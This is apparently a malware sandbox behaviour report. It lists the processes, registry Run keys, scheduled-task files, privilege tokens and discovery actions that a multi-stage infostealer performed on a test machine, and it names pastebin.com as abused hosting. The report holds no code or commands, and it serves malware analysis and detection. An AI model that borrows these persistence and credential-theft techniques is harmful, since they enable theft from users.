N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\035c4d64c6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107920101\\035c4d64c6.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a6f3c10671.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107930101\\a6f3c10671.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\99878a5969.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107440101\\99878a5969.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107450121\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\xLUFfgfR\\Anubis.exe\"" C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4abf414f45.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107910101\\4abf414f45.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107910101\4abf414f45.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107900101\03eec02af1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107920101\035c4d64c6.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107440101\99878a5969.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107870101\2b7df62c2f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107940101\1a8233e8ee.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempXDNDI8ZRONMOZUUJJYOH5TIGQOSC6H29.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107880101\5106e5bbdb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107880101\5106e5bbdb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107890101\feda7c9ffa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\gmwu\wtrpqgw.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\D9XKKB9O9N2PRS1XRFCPM2T26NLITF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempXDNDI8ZRONMOZUUJJYOH5TIGQOSC6H29.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\TempXDNDI8ZRONMOZUUJJYOH5TIGQOSC6H29.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\ProgramData\gmwu\wtrpqgw.exe N/A
N/A N/A C:\ProgramData\gmwu\wtrpqgw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107870101\2b7df62c2f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107870101\2b7df62c2f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107880101\5106e5bbdb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107880101\5106e5bbdb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107880101\5106e5bbdb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107880101\5106e5bbdb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107890101\feda7c9ffa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107890101\feda7c9ffa.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107900101\03eec02af1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107900101\03eec02af1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107900101\03eec02af1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107900101\03eec02af1.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10107880101\5106e5bbdb.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\notepad.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\notepad.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\99878a5969.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\99878a5969.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\99878a5969.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
